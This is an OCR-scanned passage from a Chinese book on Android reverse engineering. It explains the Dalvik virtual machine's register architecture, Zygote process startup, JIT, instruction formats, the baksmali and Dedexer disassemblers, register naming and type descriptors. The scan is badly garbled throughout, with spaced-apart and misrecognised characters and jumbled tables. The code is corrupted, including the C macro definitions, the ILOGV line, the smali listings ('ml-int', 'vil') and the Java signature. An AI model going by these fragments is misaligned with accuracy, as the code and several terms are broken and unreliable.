4、5 条 指令 分 别 再 次 压 入 第 一 个 参数 与 第 二 个 参数 。 第 6 条 指令 isub 从 栈 
顶 弹出 两 个 int 类 型 值 ， 将 值 相 减 ， 然 后 把 结束 压 回 栈 顶 。 这 时 求 值 栈 上 
有 两 个 int 值 了 。 第 7 条 指令 imul 从 栈 顶 弹出 两 个 int 类 型 值 ， 将 值 相 乘 ， 
然后 把 结果 压 回 栈 顶 。 第 8 条 指令 ireturm 函 数 返 回 一 个 int 值 。 到 这 里 ， 
foo() 函 数 吏 执 行 完 了 。 关 于 Java 虚 拟 机 字 节 人 码 的 其 它 内 容 ， 笔 者 在 此 就 
不 展开 了 ， 读 者 可 以 在 以 下 网 址 找到 一 份 完整 的 Java 字 节 码 指令 列表 : 
http://en.wikipedia.org/wiki/Java_bytecode_instruction listings。 

比 起 Java 虚 拟 机 字 节 码 ， 上 面 的 Dalvik 字 节 码 显得 简洁 很 多 ， 只 有 4 
条 指令 丈 完 成 了 上 面 的 操作 。 第 一 条 指令 add-int 将 v3 与 V4 寄存 右 的 值 相 
加 ， 然 后 保存 到 v0 寄 存 器 ， 整 个 指令 的 操作 中 使 用 到 了 三 个 参数 ，V3 与 
v4 分 别 代 表 foo0) 函 数 的 第 一 个 参数 与 第 二 个 参数 ， 它 们 是 Dalvik 字 市 码 
参数 表示 法 之 一 Vv 命名 法 ， 男 一 种 是 p 命 名 法 ， 本 章 3.2 小 市 会 详细 介绍 
Dalvik 汇 编 语 言 。 第 二 条 指令 sub-int 将 v3 减 去 v4 的 值 保存 到 v1 寄存 器 。 
第 三 条 指令 mul-int/2addr 将 v0 乘 以 v1 的 值 保存 到 v0 寄存 器 。 第 四 条 指令 
返回 v0 的 值 。 

Dalvik 虚 拟 机 运行 时 同样 为 每 个 线程 维护 一 个 PC 计数 器 与 调用 栈 ， 
与 Java 虚 拟 机 不 同 的 是 ， 这 个 调用 栈 维 护 一 份 寄存 嚣 列表， 寄存 右 的 数 
量 在 方法 结构 体 的 registers 字 上段 中 给 出 ，Dalvik 虚 拟 机 会 根据 这 个 值 来 创 
建 一 份 虚拟 的 寄存 器 列表 。Dalvik 虚 拟 机 运行 时 的 状态 如 图 3-3 所 示 。 


























PC 计数 器 





foo() 函 数 4 
偏 移 量 助词 符 
0000: add-int v0, v3, v4 虚拟 寄存 器 
0002: sub-int v1, v3, v4 v0 8 
PC—P 0004: mul-int/2addr vO, v1 vi| 2 
0005: return v0 v2 
v3 5 
V4 3 


图 3-3 Dalvik VM 运行 状态 


通过 上 面 的 分 析 可 以 友 现 ， 基 于 寄存 器 架构 的 Dalvik 虚 拟 机 与 基于 
栈 架 构 的 Java 虚 拟 机 相 比 ， 由 于 生成 的 代码 指令 减少 了 ， 程 序 执行 速度 
会 里 快 一 些 ， 


3.1.3 ”Dalvik 虚 拟 机 是 如 何 执行 程序 的 


Android 系 统 的 架构 采用 分 层 思想 ， 这 样 的 好 处 是 拥有 减少 各 层 之 
间 的 依赖 性 、 便 于 独立 分 及、 容易 收敛 问题 和 错误 等 优点 。Android 系 
统 由 Linux 内 核 、 函 数 库 、Android 运 行 时 、 应 用 程序 框架 以 及 应 用 程序 
组 成 。 如 图 3-4 的 Android 系 统 染 构 所 示 ，Dalvk 虚 拟 机 属于 Android 运 行 
时 环境 ， 它 与 一 些 核心 库 共 同 承担 Android 应 用 程序 的 运行 工作 。 
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图 3-4 ”Android 系 统 结构 


Android 系 统 启动 加 载 完 内 核 后 ， 第 一 个 执行 的 是 init 进 程 ，init 进 程 
自 先 要 做 的 是 设备 的 初始 化 工作 ， 然 后 读 取 inic.rc 文 件 并 启动 系统 中 的 
重要 外 部 程序 Zygote。Zygote 进 程 是 Android 所 有 进程 的 后 化 器 进程 ， 它 
启动 后 会 首先 初始 化 Dalvik 虚 拟 机 ， 然 后 启动 system_server 并 进入 
Zygote 模 式 ， 通 过 socket 等 候 命 令 。 当 执行 一 个 Android 应 用 程序 时 ， 
system_server 进 程 通 过 socket 方 式 发 送 命令 给 Zygote，Zygote 收 到 命令 后 
通过 fork 上 自身 创 建 一 个 Dalvik 虚 拟 机 的 实例 来 执行 应 用 程序 的 入 口 函 
数 ， 这 样 一 个 程序 就 司 动 完 成 了 。 整 个 流程 如 图 3-5 所 示 。 
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图 3-5 ”Zygote 启 动 进程 


Zygote 提 供 了 三 种 创建 进程 的 方法 : 

e fork0， 创 建 一 个 Zygote 进 程 ; 

e@ forkAndSpecialize()， 创 建 一 个 非 Zygote 进 程 ; 

e forkSystemServer()， 创 建 一 个 系统 服务 进程 。 

其 中 ，Zygote 进 程 可 以 再 fork0 出 其 他 进程 ， 非 Zygote 进 程 则 不 能 
fork 其 他 进程 ， 而 系统 服务 进程 在 终止 后 它 的 子 进程 也 必须 终止。 

当 进 程 fork 成 功 后 ， 执 行 的 工作 就 交 给 了 Dalv 六 虚拟 机 。Dalvik 虚 拟 
机 首先 通过 loadClassFromDex() 函 数 完成 类 的 装载 工作 ， 每 个 类 被 成 功 
解析 后 都 会 拥有 一 个 ClassObject 类 型 的 数据 结构 存储 在 运行 时 环境 中 ， 
虚拟 机 使 用 gDvm.loadedClasses 全 局 哈 希 表 来 存储 与 查询 所 有 装载 进来 
的 类 ， 随 后 ， 字 节 码 验证 器 使 用 dvmVerifyCodeFlow0 函 数 对 装 入 的 代 
码 进行 校 验 ， 接 着 虚拟 机 调用 FindClass(0) 函 数 查找 并 装载 main 方 法 类 ， 

















随后 调用 dvmInterpret() 函 数 切 始 化 解释 器 并 执行 字 节 码 流 。 上 整个 过 程 如 
图 3-6 所 示 。 
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图 3-6 Dalvik 虚 拟 机 执行 程序 流程 





3.1.4 关于 Dalvik 虚 拟 机 JIT (即时 编译 ) 


JIT (Just-in-time _ Compilation， 即 时 编译 ) ， 又 称 为 动态 编译 ， 是 
一 种 通过 在 运行 时 将 字 节 人 码 翻译 为 机 器 人 码 的 技术 ， 使 得 程序 的 执行 速度 
更 快 。Android 2.2 版 本 系统 的 Dalvik 虚 拟 机 引入 了 JIT 技 术 ， 官 方 宣称 新 
版 的 Dalvik 虚 拟 机 比 以 往 执 行 速度 快 3 一 6 倍 。 

主流 的 JIT 包 含 两 种 字 节 人 码 编译 方式 : 

e method 方 式 : 以 函数 或 方法 为 单位 进行 编译 。 

@ trace 方式 : 以 trace 为 单位 进行 编译 。 

method 方 式 很 好 理解 ， 那 什么 是 trace 方 式 呢 ? 在 函数 中 一 般 很 少 是 
顺序 执行 代码 的 ， 多 数 的 代码 都 分 成 了 好 几 条 执行 路 径 ， 其 中 函数 的 有 
些 路 径 在 实际 运行 过 程 中 是 很 少 被 执行 的 ， 这 部 分 路 径 被 称 为 “ 冷 路 
径 ”， 而 执行 比较 频 索 的 路 径 被 称 为 " 热 路 径 >”。 采 用 传统 的 method 方 式 
会 编译 整个 方法 的 代码 ， 这 会 使 得 在 “ 冷 路 径 ” 上 浪费 很 多 编译 时 间 ， 并 
是 耗费 更 多 的 内 存 ; trace 方 式 编译 则 能 够 快速 地 获取 “ 热 路 径 ” 人 代码， 使 
用 更 短 的 时 间 与 更 少 的 内 存 来 编译 代码 。 

目前 ，Dalvik 虚 拟 机 默认 采用 trace 方 式 编译 代码 ， 同 时 也 文 持 采 用 
method 方 式 来 编译 。 关 于 JII 的 详细 内 容 本 书 不 做 深入 的 探讨 ， 有 兴趣 
的 读者 可 以 参看 其 它 相 关 资 料 。 

















3.2 Dalvik 汇 编 语 言 基 础 为 分 析 Android 程 序 做 准 
多 


Dalvik 虚 拟 机 为 自己 专门 设计 了 一 套 指令 集 ， 并 且 制 定 了 自己 的 指 
令 格 式 与 调用 规范 。 我 们 将 Dalvik 指 令 集 组 成 的 代码 称 为 Dalvik 汇 编 代 
码 ， 将 这 种 代码 表示 的 语言 称 为 Dalvik 汇 编 语 言 (Dalvik 汇 编 语言 并 不 
是 正式 的 语言 ， 只 是 本 书 描述 Dalvik 指 令 集 代码 的 一 种 称呼 ) 。 本 节 主 
要 介绍 Dalvik 汇 编 语言 的 相关 基础 知识 。 








3.2.1 Dalvik 指 令 格 式 


一 段 Dalvik 汇 编 代码 由 一 系列 Dalvik 指 令 组 成 ， 指 令 语 法 由 指令 的 
位 描述 与 指令 格式 标识 来 决定 。 位 描述 约定 如 下 : 

e 每 16 位 的 字 玉 用 空格 分 隔 开 来 。 

e 每 个 字母 表示 四 位 ， 每 个 字母 按 顺 序 从 高 字 节 开始 ， 排 列 到 低 
字 节 。 每 四 位 之 间 可 能 使 用 竖 线 “" 来 表示 不 同 的 内 容 。 

e 顺序 采用 A 一 Z 的 单个 大 写字 母 作 为 一 个 4 位 的 操作 码 ，op 表 示 
一 个 8 位 的 操作 码 。 

e “@” 来 表示 这 字段 所 有 位 为 0 值 。 

以 指令 格式 “A|Glop BBBB FIEID|C” 为 例 : 

旨 令 中 间 有 两 个 空格 ， 每 个 分 开 的 部 分 大 小 为 1 位， 所 以 这 条 指令 
由 三 个 16 位 的 字 组 成 。 第 一 个 16 位 是 “AlGlop”， 高 8 位 由 A 与 G 组 成 ， 低 
字 节 由 操作 人 码 op 组 成 。 第 二 个 16 位 由 BBBB 组 成 ， 它 表示 一 个 16 位 的 偏 
移 值 。 第 三 个 16 位 分 别 由 F、E、D、C 共 四 个 4 字 节 组 成 ， 在 这 里 它们 表 
示 寄 存 器 参数 。 

单独 使 用 位 标识 还 无 法 确定 一 条 指令 ， 必 须 通过 指令 格式 标识 来 指 




















定 指令 的 格式 编码 。 它 的 约定 如 下 : 
e 指令 格式 标识 大 多 由 三 个 字符 组 成 ， 前 两 个 是 数字 ， 最 后 一 个 








e 第 一 个 数字 是 表示 指令 有 多 少 个 16 位 的 字 组 成 。 

e 第 二 个 数字 是 表示 指令 最 多 使 用 寄存 器 的 个 数 。 特 殊 标 记 “r" 标 
识 使 用 一 定 范 围 内 的 寄存 器 。 

e 第 三 个 字母 为 类 型 码 ， 表 示 指 令 用 到 的 额外 数据 的 类 型 。 取 值 
见 表 3-1。 





表 3-1 指令 格式 标识 的 类 型 码 





助 记 符 位 大 小 说 明 
b | 8 |8 位 有 符号 立即 数 
16，32 常量 池 索 引 





C 

f | ”16 | 接口 常量 ( 仅 对 静态 链接 格式 有 效 ) 

h 16 有 符号 立即 数 〈32 位 或 64 位 数 的 高 值 位 ， 低 值 位 为 0) 
i 32 立即 数 ， 有 符号 整数 或 32 位 浮 点 数 

1 64 立即 数 ， 有 符号 整数 或 64 位 双 精 度 浮 点 数 

m 16 方法 常量 〈 仅 对 静态 链接 格式 有 效 ) 

n 4 4 位 的 立即 数 

Ss 16 短 整 型 立即 数 

t Sx 16% 32 跳 转 、 分 支 

x 0 无 额外 数据 





还 有 一 种 特殊 的 情况 是 来 尾 可 能 会 多 出 另 一 个 字母 ， 如 果 是 字母 
表示 指令 采用 静态 链接 ， 如 果 古 字母 表示 指令 应 该 被 内 联 处 理 。 

以 指令 格式 标识 22x 为 例 : 

第 一 个 数字 2 表示 指令 有 两 个 16 位 字 组 成 ， 第 二 个 数字 2 表示 指令 使 
用 到 2 个 寄存 器 ， 第 三 个 字母 x 表示 没有 使 用 到 额外 的 数据 。 

另外 ，Dalvik 指 令 对 语法 做 了 一 些 说 明 ， 它 约定 如 下 : 

。 每 条 指令 从 操作 人 码 开 始 ， 后 面 紧 跟 参 数 ， 参 数 个 数 不 定 ， 每 个 
参数 之 间 采 用 带 号 分 开 。 











e 每 条 指令 的 参数 从 指令 第 一 部 分 开始 ，op 位 于 低 8 位 ， 高 8 位 可 
以 是 一 个 8 位 的 参数 ， 也 可 以 是 两 个 4 位 的 参数 ， 还 可 以 为 空 ， 如 果 指 令 
超过 16 位 ， 则 后 面部 分 依次 作为 参数 。 

e ”如 果 参 数 采 用 “vX” 的 方式 表示 ， 表 明 它 是 一 个 寄存 器 ， 如 v0、 
V1 等 。 这 里 采用 Vv 而 不 用 r 是 为 了 避免 与 基于 该 虚拟 机 架构 本 映 的 寄存 器 
命名 产生 冲突 ， 如 ARM 架 构 宫 存 器 命名 采用 r 开 头 。 

e ”如果 参数 采用 “#+X” 的 方式 表示 ， 表 明 它 是 一 个 常量 数字 。 

e 如果 参数 采用 “+X” 的 方式 表示 ， 表 明 它 是 一 个 相对 指令 的 地 址 
偏 移 。 

e 如果 参 数 采用 “kind@X” 的 方式 表示 ， 表 明 它 是 一 个 常量 池 索 引 
值 。 其 中 kind 表 示 常 量 池 类 型 ， 它 可 以 是 “string”( 字 符 串 常量 池 索 
引 ) 、“type”( 类 型 常量 池 索 引 ) 、“field”( 字 上 段 常 量 池 索 引 ) 或 
者 “meth”( 方 法 常量 池 索 引 ) 。 

以 指令 “op vAA, string@BBBB” 为 例 : 

站 令 用 到 了 1 个 寄存 器 参数 VYAA， 并 且 还 附加 了 一 个 字符 串 常量 池 
索引 string@BBBB， 其 实 这 条 指令 格式 代表 着 const-string 指 令 。 

在 Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 文档 instruction- 
formats.html， 里 面 详细 列举 了 Dalvik 指 令 的 所 有 格式 。 读 者 可 以 通过 它 
了 解 Dalvik 指 令 更 加 完整 的 信息 。 



































VN 
注 轧 


在 Android 4.1 源 码 Dalvik/docs 目 录 中 ，instruction-formats.html 已 经 被 移 除 了 。 





3.2.2 DEX 文 件 反 汇编 工具 





目前 DEX 可 执行 文件 主流 的 反 汇 编 工 具有 BakSmali 与 Dedexer。 两 


者 的 反 汇 编 效 果 都 不 错 ， 在 语法 上 也 有 着 很 多 的 相似 处 。 下 面 通 过 代码 
对 比 两 者 的 语法 差异 ， 测 试 代 码 采 用 上 一 节 的 Hello.java， 首 先 使 用 dx 工 
上 共生 成 Hello.dex 文 件 ， 然 后 在 命令 提示 符 下 输入 以 下 命令 使 用 
baksmali.jar 反 汇编 Hello.dex: 


Java -jar baksmali.jar -DO baksmaliout Hello.dex 
命令 成 功 执行 会 在 baksmaliout 目 录 下 生成 Hello.smali 文 件 ， 使 用 文 
本 编辑 器 打开 它 ，foo(0) 函 数 代 码 如 下 。 
# virtual methods 
.method public fool(II)I 
.registers 5 
.parameter 
.barameter 
.brologue 
.line 3 
add-int vO, pl, p2 
sub-int v1, pl, p2 
ml-int/2addr vO, vil 
return v0 
.end method 
执行 以 下 命令 使 用 ddx.jar (Dedexer 的 jar 文 件 ) 反 汇 编 Hello.dex: 
java -jar ddx.jar -Q ddxout Hello.dex 


命令 成 功 执行 后 ， 会 在 ddxout 目 录 下 生成 Hello.ddx 文 件 ， 使 用 文本 
编辑 器 打开 它 ，foo0 函 数 代 人 码 如 下 。 


.method public fool(II)I 
.J]imit registers 5 


; this: v2 (LHello;) 


; parameter[0] : v3 (I) 
; parameter[1] : v4 (I) 
.1]ine 3 


add-int vO,v3,v4 
sub-int vil,v3,v4 
mul-int/2addr vO,vil 
return v0 
.end method 
两 种 反 汇编 代码 大 体 的 结构 组 织 是 一 样 的 ， 在 方法 名 、 字 上 段 类 型 与 
代码 指令 序列 上 它们 保持 一 致 ， 具 体 的 差异 表现 在 一 些 语法 细节 上 。 对 
比 之 下 ， 可 以 发 现 如 下 不 同 点 : 
e 前 者 使 用 .registers 指 令 指定 函数 用 到 的 寄存 器 数目 ， 后 者 
在 .registers 指 令 前 加 了 limit 亲 级。 
e。 前 者 使 用 寄存 器 p0 作 为 this 引 用 ， 后 者 使 用 寄存 器 v2 作为 this 引 
用 。 
e 前 者 使 用 一 条 .parameter 指 令 指 定 函 数 一 个 参数 ， 后 者 则 使 用 
parameter 数 组 指定 参数 寄存 器 。 
e 前 者 使 用 .prologue 指 令 指定 函数 代码 起 始 处 ， 后 者 却 没有 。 
e 两 者 寄存 器 表示 法 不 同 ， 前 者 使 用 p 命 名 法 ， 后 者 使 用 v 命 名 
法 。《 有 具体 差异 下 一 节 进 行 讲 解 ) 
BakSmali 提 供 反 汇编 功能 的 同时 ， 还 支持 使 用 Smali 工 具 打 包 反 汇 
编 代码 重新 生成 dex 文 件 ， 这 个 功能 被 广泛 应 用 于 apk 文 件 的 修改 、 补 
丁 、 破 解 等 场合 ， 因 而 更 加 受到 开发 人 员 的 育 睐 ， 本 书 Dalvik 指 令 的 语 
法 将 采用 Smali 语 法 格式 。 











3.2.3 了 解 Dalvik 寄 存 器 


Dalvik 虚 拟 机 基于 寄存 器 架构 ， 在 代码 中 大 量 地 使 用 到 了 寄存 器 。 
Dalvik 虚 拟 机 是 作用 于 特定 架构 的 CPU 上 运行 的 ， 在 设计 之 初 采 用 了 
ARM 架 构 ，ARM 架 构 的 CPU 本 身 集成 了 多 个 寄存 器 ，Dalvik 将 部 分 寄 
存 器 映射 到 了 ARM 寄 存 器 上 ， 还 有 一 部 分 则 通过 调用 栈 进行 模拟 。 注 
意 : Dalvik 中 用 到 的 寄存 器 都 是 32 位 的 ， 支 持 任 何 类 型 ，64 位 类 型 用 2 
个 相 邻 寄存 器 表示 。 

Dalvik 虚 拟 机 文 持 多 少 个 虚拟 寄存 器 呢 ? 通过 查看 Dalvik 指 令 格式 
表 ， 可 以 发 现 类 似 “@Glop AAAA ”BBBB” 的 指令 ， 它 的 语法 为 “op 
vAAAA，vBBBB”， 其 中 每 个 大 写字 母 代 表 4 位 ，AAAA、BBBB 最 大 值 
是 2 的 16 次 方 即 65536， 寄 存 器 采用 v0 作 起 始 值 ， 因 此 ， 它 的 取 值 范围 是 
V0 一 V65535。 

Dalvik 虚 拟 机 又 是 如 何 虚 拟 地 使 用 寄存 器 的 呢 ? 这 个 还 得 从 上 面 章 
节 讲 到 的 Dalvik 虚 拟 机 的 调用 栈 说 起 ，Dalvik 虚 拟 机 为 每 个 进程 维护 一 
个 调用 栈 ， 这 个 调用 栈 其 中 一 个 作用 就 是 用 来 “虚拟 寄存器， 由 上 一 节 
我 们 知道 ， 每 个 函数 都 在 函数 头 部 使 用 .registers 指 令 指 定 函数 用 到 的 寄 
存 器 数目 ， 当 虚拟 机 执行 到 这 个 函数 时 ， 会 根据 寄存 器 的 数目 分 配 适当 
的 栈 空间 ， 这 些 空间 就 是 用 来 存放 寄存 器 实际 的 值 的 ! 虚拟 机 通过 处 理 
字 节 码 ， 对 寄存 器 进入 读 与 写 的 操作 ， 其 实 都 是 在 写 栈 空间 。Android 
SDK 中 有 一 个 名 为 dalvik.bytecode.Opcodes 的 接口 ， 它 定义 了 一 份 完整 的 
Dalvik 字 节 码 列表 。 处 理 这 些 字 节 码 的 函数 为 一 个 宏 
HANDLE_OPCODEO， 这 份 Dalvik 字 节 码 列表 中 每 个 字 节 码 的 处 理 过 程 
可 以 在 Android 源 码 的 dalvik\vm\mterp\c 目 录 中 找到 ， 拿 OP_MOVE 来 举 
例 ，OP_MOVE.cpp 内 容 如 下 : 

















HANDLE_OPCODE ($opcode /*vA, vB*/) 
vdst = INST_A(inst); 
vsrcl = INST_B(inst) ; 
ILOGV("|move®s ve%d,v%ed %s(ved=0x%08x)", 
(INST. INST(iNSt) == QOPIMOVE} TY "mT & mT-.0Bject", vdst, verel;, 
kSpacing, vdst, GET_ REGISTER(vSsrc1)); 
SET_REGISTER (vdst, GET_ REGISTER (vszcl) ) ; 
FINISH(1); 
OP_END 


INST_A 是 用 来 获取 vA 寄存 器 地 址 的 宏 ， 右 边 的 A 表示 寄存 器 的 “名 
称 ”， 可 以 是 其 他 的 字母 或 长 度 ， 如 INST_AA、INST_B 等 分 别 是 获取 
vAA 与 VB 的 地 址 。 在 OP_MOVE.cpp 文 件 同 目录 的 header.cpp 文 件 中 ， 


INST_A 与 INST_B 的 声明 如 下 : 
#define INST A(_ inst) Ct SE > BY OX OE 


#define INST B(_inst) Ci LNstEl Ss 2 

这 里 的 _inst 为 一 个 16 位 的 指令 ，INST_A 将 _inst 右 移 8 位 然后 与 0x0f 
相 与 ， 也 就 是 获取 了 _inst 高 8 位 的 低 4 位 作为 vdst 的 值 ， 而 INST_B 将 inst 
右 移 12 位 ， 也 就 是 获取 _inst 的 最 高 4 位 作为 vsrc1 的 值 。 

ILOGV 用 来 输出 调试 信息 。 

SET_REGISTER 用 来 设置 寄存 器 的 值 ，GET_REGISTER 用 来 获取 
寄存 器 的 值 。 另 外 ， 操 作 的 寄存 器 可 以 是 其 它 的 大 小 与 类 型 ， 如 
WIDE、FLOAT， 相 关 的 宏 函 数 则 是 GET_REGISTER_WIDE、 
GET_REGISTER_FLOAT。 在 header.cpp 文 件 中 ，GET_REGISTER 与 


SET_REGISTER 的 声明 如 下 : 
# define GET_ REGISTER(_idx) (EBT {. Ldx}) ]) 


# define SET_REGISTER(_idx, _val) (fp{[( Li9x)] = (valy}) 
fp 为 ARM 栈 帧 寄存 器 ， 在 虚拟 机 运行 到 某 个 函数 时 它 指向 函数 的 局 
部 变量 区 ， 其 中 就 维护 着 一 份 寄存 器 值 的 列表 ，GET_REGISTER 宏 以 
_idx 为 索引 返回 一 个 “寄存 器 ”的 值 ， 而 SET_REGISTER 则 是 以 _idx 为 索 
引 ， 设 置 相 应 寄存 器 的 值 。 如 果 Dalvik 虚 拟 机 开启 了 寄存 器 数目 验证 ， 
即 ##fdef CHECK_REGISTER_INDICES 为 真 时 ， 在 进行 寄存 器 读 写 操作 














时 ， 虚 拟 机 会 首先 判断 idx 是 否 小 于 curMethod->registersSize， 如 果 条 件 
不 成 工 则 说 明 寄 存 器 超出 引用 范围 ， 此 时 虚拟 机 会 通过 assert(!"bad reg") 
抛 出 异常 
最 后 ， 由 FINISH 宏 来 完成 一 条 指令 的 执行 。FINISH 的 功能 
ADJUST_PC 宏 来 完成 ， 主 要 是 计算 当前 指令 占用 的 长 度 ， 然 后 将 PC 寄 
存 器 加 上 计算 出 的 偏 移 ， 这 样 一 条 指令 执行 完成 后 ，PC 计 数 器 会 指 问 
一 条 将 要 执行 的 指令 


3.2.4 两 种 不 同 的 寄存 需 表 示 方 法 
p 命 名 法 


前 面 曾 多 次 提 到 v 命 名 法 与 p 命 名 法 ， 它 们 是 Dalvik 字 节 码 中 两 种 不 
同 的 寄存 器 表示 方法 。 下 面 我 们 来 看 看 ， 它 们 在 表现 上 有 一 些 什 么 样 的 
区 列 。 
假设 一 个 函数 使 用 到 M 个 寄存 器 ， 并 且 该 函数 有 N 个 参数 ， 根 据 
Dalvik 虚 拟 机 参数 传递 方式 中 的 规定 : 参数 使 用 最 后 的 N 个 寄存 器 中 ， 
局 部 变量 使 用 从 v0 开始 的 前 M-N 个 寄存 器 。 如 前 面 的 小 节 中 ，foo0 函 数 
使 用 到 了 5 个 寄存 器 ，2 个 显 式 的 整形 参数 ， 其 中 foo() 函 数 是 Hello 类 的 
非 静态 方法 ， 函 数 被 调用 时 会 传 入 一 个 隐 式 的 Hello 对 象 引 用 ， 因 此 ， 
实际 传 入 的 参数 数量 是 3 个 。 根 据 传 参 规则 ， 局 部 变量 将 使 用 前 2 个 寄存 
器 ， 参 数 会 使 用 后 3 个 寄存 器 
v 命 名 法 采用 以 小 写字 母 。 v" 开 头 的 方式 表示 函数 中 用 到 的 局 部 变量 
与 参数 ， 所 有 的 寄存 器 命名 从 v0 开 始 ， 依 次 递增 。 对 于 foo0 函 数 ，v 命 
名 法 会 用 到 v0、v1、v2、v3、vV4 等 五 个 寄存 器 ，v0 与 V1 用 来 表示 函数 的 
局 部 变量 寄存 器 ，vVv2 表 示 被 传 入 的 Hello 对 象 的 引用 ，v3 与 v4 分 别 表示 
两 个 传 入 的 整形 参数 。 
p 命 名 法 对 函数 的 局 部 变量 寄存 器 命名 没有 影响 ， 它 的 命名 规则 











V 命 名 法 与 























是 : 函数 中 引入 的 参数 命名 从 p0 开 始 ， 依 次 递增 。 对 于 foo0) 函 数 ，p 命 
名 法 会 用 到 v0、v1、p0、pl1、p2 等 五 个 寄存 器 ，v0 与 V1 同样 用 来 表示 也 
数 的 局 部 变量 寄存 器 ，p0 表 示 被 传 入 的 Hello 对 象 的 引用 ，p1 与 p2 分 别 
表示 两 个 传 入 的 整形 参数 。 

对 于 有 M 个 寄存 器 及 N 个 参数 的 函数 foo() 来 说 ，v 命 名 法 与 p 命 名 法 
的 表现 形式 如 表 3-2 所 示 。 通 过 观察 可 以 发 现 ， 使 用 p 命 名 法 表示 的 
Dalvik 汇 编 代码 ， 通 过 寄存 器 的 前 级 更 容易 判断 寄存 器 到 底 是 局 部 变量 
寄存 器 还 是 参数 寄存 器 ， 在 Dalvik 汇 编 代码 较 长 、 使 用 寄存 器 较 多 的 情 
况 下 ， 这 种 优势 将 更 加 明显 。 

表 3-2 Vv 命名 法 与 p 命 名 法 
寄存 器 含义 
第 一 个 局 部 变量 寄存 器 
第 二 个 局 部 变量 寄存 器 
中 间 的 局 部 变量 寄存 器 依次 递增 且 名 称 相 同 
第 一 个 参数 寄存 器 
中 间 的 参数 寄存 器 分 别 依次 递增 
第 N 个 参数 寄存 器 











































3.2.5 Dalvik 字 市 码 的 类 型 、 方 法 与 字段 表示 方法 











Dalvik 字 节 码 有 着 一 套 自己 的 类 型 、 方 法 与 字段 表示 方法 ， 这 些 方 
法 与 Dalvik 虚 拟 机 指令 集 一 起 组 成 了 一 条 条 的 Dalvik 汇 编 代 码 。 

1. 类 型 

Dalvik 字 节 码 只 有 两 种 类 型 ， 基 本 类 型 与 引用 类 型 。Dalvik 使 用 这 
两 种 类 型 来 表示 Java 语 言 的 全 部 类 型 ， 除 了 对 象 与 数组 属于 引用 对 象 
外 ， 其 他 的 Java 类 型 都 是 基本 类 型 。BakSmali 严 格 遵守 了 DEX 文 件 格式 
中 的 类 型 描述 符 〈DEX 文 件 格式 将 在 第 四 章 进 行 介绍 ) 定义 。 类 型 描述 
符 对 照 如 表 3-3 所 示 。 

















double 
Java 类 类 型 
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数组 类 型 


每 个 Dalvik 寄 存 避 都 是 32 位 大 小 ， 对 于 小 于 或 等 于 32 位 长 度 的 类 型 











来 说 ， 一 个 寄存 器 就 可 以 存放 该 类 型 的 值 ， 而 像 J)、D 等 64 位 的 类 型 ， 和 写 
们 的 值 是 使 用 相 邻 两 个 寄存 器 来 存储 的 ， 如 V0 与 v1、V3 与 v4 等 。 

EL 类 型 可 以 表示 Java 类 型 中 的 任何 类 。 这 些 类 在 Java 代 码 中 以 
package.name.ObjectName 方 式 引 用 ， 到 了 Dalvik 汇 编 代码 中 ， 它 们 以 
Lpackage/name/ObjectName; 形 式 表 示 ， 注 意 最 后 有 个 分 号 ， 工 表示 后 面 
跟着 一 个 Java 类 ，package/name/ 表 示 对 象 所 在 的 包 ，ObjectrName 表 示 对 
象 的 名 称 ， 最 后 的 分 号 表示 对 象 名 结束 。 例 如 : Ljava/lang/String; 相 当 
于 java.lang.String。 

[类 型 可 以 表示 所 有 基本 类 型 的 数组 。[ 后 面 紧 跟 基本 类 型 描述 符 ， 
如 [I 表示 一 个 整 型 一 维 数组 ， 相 当 于 Java 中 的 int]。 多 个 [在 一 起 时 可 用 
来 表示 多 维 数组 ， 如 [[I 表 示 int[[]，[[[1 表 示 int[]j[[]。 注 意 多 维 数 组 的 维 
数 最 大 为 255 个 。 

L 与 [可 以 同时 使 用 用 来 表示 对 象 数 组 。 如 [Ljava/lang/String; 束 表示 
Java 中 的 字符 串 数组 。 

2 








方法 的 表现 形式 比 类 名 要 复杂 一 些 ，Dalvik 使 用 方法 名 、 类 型 参数 
与 返回 值 来 详细 描述 一 个 方法 。 这 样 做 一 方面 有 助 于 Dalvik 虚 拟 机 在 运 
行 时 从 方法 表 中 快速 地 找到 正确 的 方法 ， 另 一 方面 ，Dalvik 虚 拟 机 也 可 
以 使 用 它们 来 做 一 些 静态 分 析 ， 比 如 Dalvik 字 节 码 的 验证 与 优化 。 

方法 格式 如 下 : 

Lpackage/name/ObjectName;->MethodName(IID)Z 

在 这 个 例子 中 ，Lpackage/name/ObjectName;- 应 该 理解 为 一 个 类 
型 ，MethodName 为 具体 的 方法 名 ，(IDZ 是 方法 的 签名 部 分 ， 其 中 括号 
内 的 III 为 方法 的 参数 在 此 为 三 个 整 型 参数 ) ，Z 表 示 方 法 的 返回 类 型 
(boolean 类 型 )。 


下 面 是 一 个 更 为 复杂 的 例子 : 


method (I[[IILjava/lang/string; [Ljava/lang/Object;)Ljava/lang/string; 

按照 上 面 的 知识 ， 将 其 转换 成 Java 形 式 的 代码 应 该 为 : 

StrFinog methodtine. nel] Lt] int BELING QBIecEl]) 

BakSmali 生 成 的 方法 代码 以 .method 指 令 开 始 ， 以 .end method 指 令 结 
束 ， 根 据 方法 类 型 的 不 同 ， 在 方法 指令 开始 前 可 能 会 用 井 号 “#' 加 以 注 
释 。 如 '“# Virtual methods” 表 示 这 是 一 个 虚 方 法 ，“# direct methods” 表 示 
这 是 一 个 直接 方法 。 

3， 字 段 

字段 与 方法 很 相似 ， 只 是 字段 没有 方法 签名 域 中 的 参数 与 返回 值 ， 
取而代之 的 是 字段 的 类 型 。 同 样 ，Dalvik 虚 拟 机 定位 字段 与 字 节 码 静 态 
分 析 时 会 用 到 它 。 字 段 的 格式 如 下 : 

Lpackage/name/ObjectName;->FieldName:Ljava/lang/String; 

字段 由 类 型 (Lpackage/name/ObjectName;) 、 字 段 名 

(FieldName) 与 字段 类 型 (Ljava/lang/String;) 组 成 。 其 中 字段 名 与 字 

段 类 型 中 间 用 冒号 “:” 隔 开 。 

BakSmali 生 成 的 字段 代码 以 ,field 指令 开头 ， 根 据 字 段 类 型 的 不 同 ， 














在 字段 指令 的 开始 可 能 会 用 井 写 “#” 加 以 注释 ， 如 人 # instance fields” 表 示 
这 是 一 个 实例 字段 ，“# instance fields” 表 示 这 是 一 个 静态 字段 。 


3.3 Dalvik 指 令 集 


在 Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 指 令 集 文档 dalvik- 
bytecode.html， 里 面 详细 列举 了 Dalvik 支 持 的 所 有 指令 ， 不 过 该 文档 在 
